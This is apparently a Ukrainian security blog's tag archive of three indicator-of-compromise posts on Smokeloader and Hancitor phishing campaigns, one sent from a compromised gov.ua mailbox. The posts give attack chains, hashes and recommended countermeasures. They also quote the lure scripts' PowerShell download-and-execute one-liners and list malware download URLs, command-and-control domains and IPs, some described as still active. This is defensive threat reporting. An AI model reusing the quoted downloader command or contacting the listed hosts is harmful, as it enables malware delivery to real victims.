Tag Archive | Chanitor

IOC_smokeldr_121117_ДСНС_gov.ua

Доброго дня, панове.
Візьміть до уваги – в розсилці приймала участь скринька з домену gov.ua (заголовки не підроблені)!

12 листопада, близько 23ї години були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (попередні зразки тут, тут і тут).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Фактично через нього зловмисники збирають інформацію із скомпрометованих систем і можуть в подальшому довантажити модуль шифрування/затирання файлів.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) – зверніть увагу на приклади трьох правил Access Protection які наведені в кінці допису

Трохи аналітики:

  • Рівень загрози – високий!, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.
  • Незважаючи на вельми примітивну техніку активації приманки (JS скрипти) я ставлю цій розсилці високий рівень загрози через той факт, що одним із джерел була скомпрометована скринька Управління ДСНС Чернігівської області (sribne@cndsns[.]gov[.]ua)

  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня
  • Доставка – через обфусковані JS скрипти із подвійним розширенням у оболонці lzh. (застосували інший формат для обходу фільтрів пошти)
  • Скрипт який було надано а аналіз містить одну прямо задану адресу, а основна частина записується із прямо заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Сервер з якого завантажується payload та сервер контролю – один і той же
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Знову застосовується тактика використання скомпрометованих ресурсів/серверів держ. організацій – gov.ua як правило в “білому” списку
  • Слід очікувати повторних акцій із використанням міксу різних типів доставки та скомпрометованих джерел із зони gov.ua та ua
  • Не достатній рівень уваги до вразливостей застарілих версій систем, яким скористалися зловмисники, призвела до компрометації цього серверу, завтра чи навіть через годину хтось може стати наступним – не будьте жертвою, перевірте наявні вразливості, оновіть софт, змініть паролі

Схема атаки:

email > Attach (lzh) > JS > WSCript > PowerShell > single hardcoded URL > GET > %temp%\65536.exe 
ім'я запускного файлу(співпадає з попередньою розсилкою)

Маркери IOC:

архів:

File name Рахунки Продмаркет.lzh
SHA-256 a47e11e6dc8025575ac3f1742fcf84270d9cd2ab1757d59dee873b1a35f76528
File size 65.34 KB

скрипт приманка:

File name Рахунок по оплаты.xls.js
SHA-256 d0635dfd5e212e16c580d70a18d195a5cc842355a22348f925515a5520725231
File size 21.38 KB

основна частина:

File name micro.exe >> %temp%\65536.exe
SHA-256 63da5f0e5ed298cbf39422298c80f460fa75f46c7d78ce0dd806f30e70c027b5
File size 240 KB

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рахунок до оплаты.xls.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';
$http_request.open('GET', 'h11p:\\autoxls[.]ru/documentooborot/micro.exe', $false);
$http_request.send();if($http_request.Status -eq "200"){$adodb.open();
$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;
$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe (співпадає з попередньою розсилкою)

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
IM Providers
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

Зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows\ (штатний режим) а з C:\Windows\SysWOW64\

Мережеві IOC:

завантаження payload – досі активна

54.86.9.242:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

54.86.9.242:80 HTTP 117 bbank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

а тепер саме головне

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів, але за умови що він розуміє формат lzh (Email Gateway)
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)
Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику POwershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_171017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядав раніше – тут, тут і тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітким іменем файлу.

Цікаво, що завантаження відбувається не через WSH а засобами Powershell.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектується по GTI.

Схема атаки:

email > Attach (7z) > JS > single hardcoded URL > GET > %temp%\65536.exe

Маркери IOC:

архів:

File name документи.7z
SHA-256 397ad07ab15f802559ac1829ac9c8434bc7c0b6fb55264b088659b638a28ad0d

скрипт приманка:

File name Договор_1743.js
SHA-256 56d9c0da7f825cb474633057e12a1cf197af2352bd0d876591483e2d40472fda

основна частина:

File name pax.exe      >> %temp%\65536.exe
SHA-256 99671ce5287926ac6496a37abd42c87cc1a045696244cc833c3dbc041270cc25

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Договор_1743.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://docfileserver.ru/bank/pax.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run 
Classes
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає новий екземпляр explorer.exe і оперує від його імені.

Трафік скомпрометованої системи:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Відволікаючи маневр – з’єднання із сайтами java, MS etc

[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT 
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED
[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

49.51.38.37 80 HTTP 368 docfileserver.ru GET /bank/pax.exe HTTP/1.1

трафік системи після зараження:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_hancitor_250517

Підступний “Google Docs”. Уважно читайте адресу посилання, а не текст на ньому!

Вчора (25го травня) в другій половині дня була зафіксована розсилка Hancitor (Chanitor).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Вперше його розсилки було зафіксовано в січні 2017.
Ступінь загрози – середній. Вразливосте не використовує. Активація відбувається через запуск макросів.

Зверніть увагу на такі деталі:
– Документ генерується із іменем домену жертви (як і поле теми фішингового листа).
– Після успішного інфікування доставка основних модулів здійснюється із затримкою (30-40 хв).

Схема роботи:
– – – – – – – – – – – – –

email > URL > DOC > macro > URL > EXE > downloader

Маркери (IOC):
– – – – – – – – – – – – –

#1 email

Received: from homewatchohio.com [74.142.241.82]

Заголовки листів містять:
From: “Google Docs” <accountant@%company%.com>
Subject: %домен жертви% has sent you a document through Google Docs!

#2 URL

h11p://freeholdsurg.com/viewdoc/file.php?document={base64string} [46.173.218.143]

Ініші сервери з яких розповсюджується документ з макросами:
h11p://hazletfamilycare.com/viewdoc/file.php?document=
h11p://freeholdretractor.com/viewdoc/file.php?document=
h11p://freeholdsurgical.info/viewdoc/file.php?document=
h11p://homesmartfinancial.com/viewdoc/file.php?document=
h11p://freeholdsurg.com/viewdoc/file.php?document=
h11p://execps.com/viewdoc/file.php?document=
h11p://bioremediation-products.com/viewdoc/file.php?document=
h11p://strategic-ls.net/viewdoc/file.php?document=
h11p://cindysgraphicdesigns.com/viewdoc/file.php?document=

#3 DOC із макросом

Документи мають назву по шаблону:

Billing_%домен жертви%.doc

File Name Billing_noname.com.doc
MD5 Hash Identifier 89CEA54551FBF7C71058A7DE6322934D
SHA-1 Hash Identifier 2BF315F4FCB4A36924E64E4AD2F5A6BA8D07C06D
SHA-256 Hash Identifier 0CF705E4804F3585E44368E8D611DDB9376863FF8C4400D156D043F6B181924E
File Size 206336 bytes
File Type Composite Document File V2 Document, Microsoft Office Word

Макрос при активації відкриває з’єднання із такими серверами:

212.129.51.160
h11p://API.IPIFY.ORG – перевірка зовнішнього IP
h11p://FORDEBUBUT.COM [212.129.51.160] – завантаження EXE
h11p://GREGORYRULLO.COM – зламані сайти із скриптами
h11p://REWNINGIDEN.COM [185.118.66.252] – 2C
h11p://WWW.HOMESDECORATINGIDEAS.COM – зламані сайти із скриптами

#4 EXE

File Name BND2B1.tmp
MD5 Hash Identifier AF7078278C943D35BD910989865857E5
SHA-1 Hash Identifier BD60C974AB62E65D98DD322A461F0DCBBB0A30AB
SHA-256 Hash Identifier ACEBA8DB5676FD88C2EE3C63D99A6EF1A1B54D740AC25C2E6F4195EF08DB0CC6
File Size 193536 bytes

Після запуску відкриває з’єднання із :

REWNINGIDEN.COM [185.118.66.252]

#5 Мережевий трафік із скомпрометованої системи

h11p://fordebubut.com 212.129.51.160
h11p://gregoryrullo.com 50.62.110.1
h11p://homesdecoratingideas.com 192.196.156.150
h11p://rewningiden.com 185.118.66.252
h11p://kedrolhechedt.com 92.242.40.92
h11p://dijussoda.com 185.66.9.164
h11p://api.ipify.org 54.225.154.40, 54.243.147.114, 107.21.113.24, 23.23.102.58, 23.23.120.37, 50.19.238.1

# # #

Рекомендації:
– – – – – – – – – – – – –

1) Перевірка спроб з’єднань із такими ресурсами та внесення їх у чорний список:

  • h11p://FREEHOLDSURG.COM [46.173.218.143]
  • h11p://FORDEBUBUT.COM [212.129.51.160]
  • h11p://REWNINGIDEN.COM [185.118.66.252]

2) Відключення макросів у пакеті MS Office через GPO

3) Фільтрація каналів доставки (web та email) на предмет макросів, скриптів та ін.

4) Заборона створення та запуску нових .tmp та .exe файлів у каталозі %AppData%

5) Співбесіди на тему фішингу, соц інженерії

6) Застосування “пісочниці”

7) Перевірити налаштування GTI на кінцевих точках, т.к. основне тіло детектується антивірусом (див. KB53733)

Будьте уважні та обережні.

VR